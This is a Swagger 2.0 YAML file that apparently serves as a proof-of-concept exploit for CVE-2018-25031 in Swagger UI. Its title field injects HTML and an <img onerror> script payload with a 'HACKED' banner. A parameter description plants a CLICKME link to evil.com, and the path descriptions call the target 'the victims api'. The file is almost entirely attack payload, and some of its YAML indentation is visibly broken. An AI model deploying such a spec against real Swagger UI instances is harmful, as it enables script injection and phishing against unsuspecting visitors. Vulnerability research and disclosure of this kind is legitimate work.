---
swagger: '2.0'
info:
  title: Exploited by <a href="//hackerone.com/almuntadhar">Al-Muntadhar</a> - HACKED <img src=x onerror="alert()" />
  description: |
    CVE-2018-25031 

  version: production
basePath: /fakeapi/almuntadhar
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/almuntadhar":
    get:
      responses:
        '200':
          description:  You are interacting with the victims api
      tags:
      - EZ
      operationId: findAccounts
      summary: this is example text 
  "/almuntadhar_delete":
    delete:
      parameters:
      - description: |
           <a href="//evil.com">CLICKME</a>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: CVE-2018-25031
      tags:
      - Swagger UI exploit
      operationId: swagger
      summary: swagger
    get:
      parameters:
      - description:  Test
      format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description:  Test
          tags:
      - Swagger UI exploit
      operationId: some_operation
      summary: this is example text
